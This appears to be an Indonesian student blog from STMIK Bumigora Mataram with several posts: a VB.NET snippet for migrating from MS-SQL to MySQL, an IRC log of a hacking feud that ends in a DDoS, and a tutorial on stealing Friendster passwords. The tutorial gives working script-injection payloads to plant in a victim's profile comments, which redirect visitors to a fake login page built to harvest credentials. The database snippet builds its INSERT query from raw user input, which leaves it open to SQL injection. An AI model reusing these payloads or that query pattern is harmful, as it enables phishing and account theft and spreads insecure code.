STMIKBG MATARAM

Banyak jalan menuju roma, pepatah sederhana yang bermanfaat. Kemarin aku sama broklyn sempat pusing juga melakukan migrasi codeing dari MS-SQL ke mySQL 5.0, Migrasi ini mulai dari struktur query, Data Provider, Table Structured, Dan masih banyak lagi yang harus dilakukan.

Cukup pusing juga, tapi mau tidak mau hal ini harus dilakukan karena target penjualan dari aplikasi sekarang lebih diarahkan ke end-user menengah kebawah, kebanyakan end-user belum berani untuk investasi ke DBMS bayar nan mahal.
Adapun beberapa perubahan yang dilakukan pada code aplikasi antara lain pada connectionstring dan data provider yang digunakan.

Imports MySql.Data.MySqlClient
Module Koneksi
    Public Conn As MySqlConnection
    Public Sub MyCon()
      Conn = New MySqlConnection
        Conn.ConnectionString = "Server=" & _
        Trim(DS.Tables("setting").Rows(0).Item("server name").ToString) & _
        ";Database=" & _
        Trim(DS.Tables("setting").Rows(0).Item("database").ToString) & _
        ";Uid=" & _
        Trim(DS.Tables("setting").Rows(0).Item("user name").ToString) & _
        ";Pwd=" & Trim(DS.Tables("setting").Rows(0).Item("user password").ToString) & ";"
        Conn.Open()
    End Sub
End Module

Pada struktur query dan method error handling

DC = New MySqlCommand("Insert into barang ( `kode_barang` , `nama_barang` , " & _
         "`HPP` , `HJual_unit` , `stok_outlet` , `stok_gudang`" & _
         " , `satuan` , `kat_id`) values ('" & _
         Trim(TxtKode.Text) & "','" & _
         Trim(TxtNama.Text) & "'," & _
         Val(TxtHPP.Text) & "," & _
         Val(TxtHJual_Unit.Text) & "," & _
         Val(TxtStokOutlet.Text) & "," & _
         Val(TxtStokGudang.Text) & ",'" & _
         Trim(TxtSatuan.Text) & "','" & _
         Trim(TxtKat_Id.Text) & "')")

        DC.Connection = Conn
          Try
            DC.ExecuteNonQuery()
            Catch err As MySqlException
                MessageBox.Show(err.Message)
            End Try

Dan masih banyak lagi perubahan-perubahan yang harus dilakukan jika melakukan migrasi ke mysql, yang paling berat yakni codeing ulang stored procedure. TSQL di MS-SQL beda sekali syntaxnya dengan SP di mySQL.

Gara-gara seorang personil #gokil FS nya diganti user name dan diprofilenya ada “Hacked by Broklyn”, pasukan-pasukan gokil memulai perang terbuka. Ok, no problem

* Joins: zxvf (hendy@my.lovely.girlfriend.is-sexy.be) I change this nick for next victim.

Tanpa basa-basi dan langsung vonis, ip psybnc gw dieksekusi yah kena DDOS deh dan sampai detik ini attackingnya lom selesai, sambil menunggu dan persiapan untuk perang yang akan memakan waktu yang panjang, gw santai and ngeblog dulu ah.

* Joins: zxvf (hendy@my.lovely.girlfriend.is-sexy.be)
* zxvf slaps |SlackWare| around a bit with a large (.)y(.)
<|SlackWare|> wow
<|SlackWare|> zxvf?
<|SlackWare|> anak gokil
<zxvf> hehehhehe. alow bro
<|SlackWare|> ya om
<|SlackWare|> 
<|SlackWare|> utusannya arien om?
<zxvf> ¿?
* zxvf is now known as zxvf895
<|SlackWare|> tumben kesini
<|DarK_LorD|> Wuihhhh koq aq bisa ada disini ya????
<zxvf895> oh bukan utusan
<|SlackWare|> then?
* zxvf895 is now known as zxvf
<zxvf> cuma mau tanya aja
<zxvf> ada mslh apa sbnr nya kalian sama arien
* |DarK_LorD| bagi-in anak² #planetwar BigMac -Mc.Donald- biar 'gak kélaparan gara² châtting ...
<|SlackWare|> aku gak ada masalah
<|SlackWare|> memang knpa?
<|SlackWare|> tuh piter pnya masalah
<zxvf> ya aku denger aja ada mslh
<zxvf> 0ow
<zxvf> kalian yg hack FS arien kah ?
<zxvf> sm flood dia kmrn ?
<|SlackWare|> ??? maksudnya?
<|SlackWare|> hack FS gt
<|SlackWare|> wew
<|SlackWare|> flood
<|SlackWare|> aku gak online
<zxvf> broklyn <=- kenal ?
<|SlackWare|> sore cuman cek email ama login mirc sbntr
<|SlackWare|> broklyn kenal dong
<|SlackWare|> itu kan tim gw
<|SlackWare|> programer
<zxvf> soalnya yg aku dengar di FS nya ada hacked by broklyn
<|SlackWare|> yaaa
<|SlackWare|> gw liat kok
<zxvf> sama team kalian ?
<|SlackWare|> trs kmrn gw dijadiin tersangka
<zxvf> sama team kalian ?
<|SlackWare|> broklyn itu tim programer gw
<|SlackWare|> mmg knapa?
<zxvf> itu di hack nya sma team kalian ?
<|SlackWare|> personal
<|SlackWare|> jgn2 bawa2 team
<|SlackWare|> lagian kok gara2 FS harus ribut
<|SlackWare|> jumatan euy
<zxvf> Ok skrg yg flood arien sapa ?
<|SlackWare|> nah itu gw gak tau
<|SlackWare|> mang flood itu apa?
* Joins: Guest15960 (~chu@server15.01domain.net)
<zxvf> ¿?
-----<whois>----------------------------
» Nick: zxvf
» Name: ÅRMÃGËÐDÖÑ
» Hostmask: hendy@my.lovely.girlfriend.is-sexy.be
» Channels: #planetwar @#24jam @#gokil @#LifeStream #madat +#deathwars @#avatar #jampank
» Server: punch.va.us.dal.net
» Registered Nickname: Yes.
-----</whois>---------------------------
<Guest15960> ?
* Guest15960 is now known as AirSnort|Root2|
<zxvf> oh ya bro
<zxvf> broklyn team kamu kan ?
<|SlackWare|> yaa
<zxvf> yo wes gini aja
<|SlackWare|> mang kenapa?
<zxvf> coba sek bilangkan kalo mau rusuh jg ncari yg ga bisa apa² kayak arien gitu 
<|SlackWare|> ciee
<|SlackWare|> so?
<zxvf> yang aku denger kamu juga sering rusuh toh
<|SlackWare|> rusuh
<|SlackWare|> mang kenapa
<|SlackWare|> suka dong
<|SlackWare|> beh
<|SlackWare|> lsg DDOS ip gw
* Disconnected
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Destination host unreachable.
Destination host unreachable.
Destination host unreachable.
Destination host unreachable.
Destination host unreachable.

Aku cuma bisa bergumam, War is starting now, saat ini shell gw lemot, yang ada juga cuman windows 2003 server, trs Linux web176.opentransfer.com 2.6.26.2 belum begitu optimal tapi tunggu seiring perjalanan waktu, all #sysHACK and #samarindahack crew not die. Jangan engkau bangunkan singa tidur.

Stmik bumigora mataram melaksanakan ospek untuk mahasiswa barunya, ada mahasiswa yang senang alias nerima aja, ada yang kayaknya jadi pendendam sama seniornya. Nih hasil jepretan salah seorang maba, begitu terkesan dengan seorang seniornya.

Untuk mendapatkan password user friendster, susah-susah gampang, dibilang gampang karena kita hanya memasukkan sebuah script untuk melakukan redirect ke halaman fakelogin.
Kenapa harus fakelogin?
Karena dengan menggunakan fakelogin kita akan menjebak sipemilik friendster (korban) untuk melakukan login ulang.
Beberapa tehnik untuk melakukan redirecting kehalaman fakelogin

1. Menggunakan meta content, untuk redirect keweb fake login seperti contoh dibawah ini

<meta content='0;url=http://stmikbg.com/fs' http-equiv='Refresh' />

2. Menggunakan tag script dengan mengarahkan script sourcenya keweb tempat halaman fakelogin, untuk langkah kedua ada beberapa langkah yang harus diperhatikan diantaranya :

• Memasukkan tag script kecomment korban, script yang dimasukkan adalah

<pre><script src="http://yourwebfakelogin.com/redirect.js"></script></pre>

• Membuat file ‘redirect.js’ diurl yang dituju oleh script yang dimasukkan sebelumnya, adapun script yang dimasukkan ini yakni

  document.location = "http://yourwebfakelogin.com";

Langkah selanjutnya membuat halaman fakelogin yang mirip dengan halaman login friendster aslinya.

Akun friendster saya sempat tidak bisa saya buka, ketika saya view profile saya langsung dirediret kehalaman lain. Saya teliti ternyata seseorang mensubmit script lewat comment. Friendster kenapa tidak ngeblok tag <script> seh, jadinya FS gw dihack orang deh.

Tapi bagaimanapun kita yang memiliki akun FS tetap sebagai pemegang kendali, setelah sekian lama gw coba akhirnya saya bisa menghapus tag <script> tadi. Bagi pengguna modzila firefox cukup dengan jalan membuka pop-menu tools kemudian option pada tab content kemudian hilangkan centang pada Enable Javascript, Enable Java seperti yang ditampilkan pada gambar dibawah ini.

Tekan OK, dan buka kembali comment pada akun FS anda, periksa kira-kira comment mana yang berisi script dibawah ini

<script src="http://friendsterworm.fileave.com/redirect.js"></script>

Hapus comment tersebut, biasanya comment seperti ini tag scriptnya tidak kelihatan, coba anda cek pada view source code.